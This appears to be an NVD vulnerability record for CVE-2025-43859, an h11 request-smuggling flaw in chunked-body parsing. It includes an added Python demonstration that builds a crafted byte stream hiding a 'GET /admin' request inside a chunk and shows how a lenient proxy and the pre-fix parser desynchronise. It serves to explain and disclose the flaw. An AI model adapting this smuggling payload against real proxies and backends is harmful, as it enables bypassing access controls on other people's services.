FKIE_CVE-2025-43859

Vulnerability from fkie_nvd - Published: 2025-04-24 19:15 - Updated: 2025-04-29 13:52
Summary
h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.
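To make the summary concrete, the following is an added example written for this page, not h11's code: a minimal chunked-body reader with pluggable handling of the bytes after each chunk's data, run over one constructed byte stream. Three policies are compared. The pre-0.16.0 leniency is modelled here as discarding the two bytes after chunk data without inspecting them (a model for illustration; the linked commit is the authoritative change). The "buggy (reverse) proxy" the summary refers to is modelled as a hypothetical proxy that accepts a bare LF where CRLF belongs. The request bytes, the `/admin` path and the `backend.internal` host are all constructed for the demonstration.

```python
# Added example, not h11's code: a minimal chunked-body reader with pluggable
# terminator handling, run over one constructed byte stream.
#
# Assumptions (not from the advisory): the pre-0.16.0 leniency is modelled as
# discarding the two bytes after chunk data without checking them; the
# "buggy proxy" is modelled as one that accepts a bare LF as the terminator.


def _read_line(buf, pos):
    """Return (line without CRLF, position after CRLF); lines must end in CRLF."""
    end = buf.find(b"\r\n", pos)
    if end < 0:
        raise ValueError("no CRLF-terminated line at offset %d" % pos)
    return buf[pos:end], end + 2


def read_chunked(buf, terminator):
    """Parse one chunked body from the start of buf.

    terminator(buf, pos) consumes whatever follows a chunk's data and returns
    the new position, or raises ValueError. Trailers are not supported: the
    last-chunk line must be followed directly by CRLF.
    Returns (body, number of bytes consumed).
    """
    pos, body = 0, bytearray()
    while True:
        line, pos = _read_line(buf, pos)
        size = int(line.split(b";", 1)[0].strip().decode("ascii"), 16)
        if size == 0:
            break
        if len(buf) < pos + size:
            raise ValueError("truncated chunk data")
        body += buf[pos:pos + size]
        pos = terminator(buf, pos + size)
    if buf[pos:pos + 2] != b"\r\n":
        raise ValueError("last chunk not followed by CRLF")
    return bytes(body), pos + 2


def terminator_strict(buf, pos):
    """Behaviour of the fix: chunk data must be followed by exactly CRLF."""
    if buf[pos:pos + 2] != b"\r\n":
        raise ValueError("chunk data followed by %r, not CRLF" % buf[pos:pos + 2])
    return pos + 2


def terminator_skip_two(buf, pos):
    """Model of the pre-0.16.0 leniency: two bytes discarded, never inspected."""
    return pos + 2


def terminator_bare_lf(buf, pos):
    """Hypothetical proxy leniency: CRLF or a bare LF ends the chunk data."""
    if buf[pos:pos + 2] == b"\r\n":
        return pos + 2
    if buf[pos:pos + 1] == b"\n":
        return pos + 1
    raise ValueError("chunk data followed by %r, not CRLF" % buf[pos:pos + 2])


# Constructed request bytes. The second chunk-size line "40" (0x40 = 64) is
# chosen so that the lenient backend discards "\n4" and then reads "0" as the
# size of the last chunk, ending the body right after "ab", while the proxy
# still reads 64 more bytes of chunk data before it sees the last chunk.
SMUGGLED = (b"GET /admin HTTP/1.1\r\n"
            b"Host: backend.internal\r\n"
            b"X-Smuggled: yes\r\n")           # 62 bytes
INNER = b"\r\n" + SMUGGLED                    # 64 bytes, the proxy's second chunk
STREAM = (b"2\r\nab\n"                        # chunk "ab" ended by a bare LF
          + b"%x\r\n" % len(INNER) + INNER + b"\r\n"
          + b"0\r\n\r\n")


def desync_demo(stream=STREAM):
    """Run the three readers over the same bytes; report body and leftover."""
    readers = [("proxy_bare_lf", terminator_bare_lf),
               ("h11_pre_0_16_model", terminator_skip_two),
               ("h11_0_16_strict", terminator_strict)]
    seen = {}
    for name, policy in readers:
        try:
            body, used = read_chunked(stream, policy)
            seen[name] = {"body": body, "remaining": stream[used:]}
        except ValueError as exc:
            seen[name] = {"error": str(exc)}
    return seen


if __name__ == "__main__":
    for name, outcome in desync_demo().items():
        print(name, outcome)
```

Run over the same 81 bytes, the bare-LF proxy model sees one request whose body is "ab" plus the 64-byte second chunk and forwards the whole stream as a single request; the skip-two backend model ends the body after "ab" and is left with bytes that begin `GET /admin HTTP/1.1`, which it would parse as a second request the proxy never inspected. The strict reader rejects the stream at the first non-CRLF terminator, so there is nothing left to smuggle, which is why the summary says fixing either component is sufficient.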
{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11\u0027s parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue."
    }
  ],
  "id": "CVE-2025-43859",
  "lastModified": "2025-04-29T13:52:28.490",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-04-24T19:15:47.060",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-444"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}